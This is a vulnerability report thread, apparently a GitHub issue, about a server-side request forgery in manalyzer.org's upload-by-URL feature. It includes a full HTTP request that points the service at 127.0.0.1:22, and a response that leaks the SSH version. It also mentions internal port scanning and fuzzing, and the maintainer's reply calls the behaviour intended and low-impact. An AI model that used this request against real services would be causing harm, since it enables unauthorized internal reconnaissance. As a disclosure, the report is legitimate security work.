Server-side request forgery on manalyzer.org via url upload

Question

Server-side request forgery on manalyzer.org via url upload

opened this issue 3 years ago · comments

Hi manalyzer team

there an ssrf on the request via url upload , as you can see here ssh version u used is leaked in the Response :

Request

POST /upload HTTP/1.1
Host: manalyzer.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------210165242507531672849060397
Content-Length: 186
Origin: https://manalyzer.org
Connection: close
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------210165242507531672849060397
Content-Disposition: form-data; name="url"

http://127.0.0.1:22/
-----------------------------210165242507531672849060397--

Response

HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Sun, 03 Oct 2021 14:26:10 GMT
Content-Type: application/json
Content-Length: 192
Connection: close
Strict-Transport-Security: max-age=63072000; includeSubdomains
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=63072000
X-Frame-Options: DENY
X-Content-Type-Options: nosniff

{"data":{"error_message":"An error occurred while retrieving the requested file ((
'Connection aborted.', BadStatusLine('SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2\\r\\n')))."},"status":"failed"}

Attacker able to scan internal ports also can make a directory enumeration on http://127.0.0.1/$FUZZ$ ... for fixing block access to internal hosts

Ivan Kwiatkowski · Answer 1 · Mon Oct 04 2021 21:38:44 GMT+0800 (China Standard Time)

Hello! This was reported several times already. This feature is part of the normal features of the website (it is supposed to connect to other resources to download samples).
Quoting from the bug bounty page:

Security issues in the manalyzer.org machine are eligible as well. However, only bugs which have an actual security impact will be rewarded with money (i.e. exploitability needs to be demonstrated). In particular, vulnerabilities commonly used to extort money from gullible clients or otherwise fill empty pentest reports (missing clickjacking headers, XSS on logout forms, etc.) will be ignored. You know what these are.

It doesn't feel like reading an SSH banner will lead to any security issue.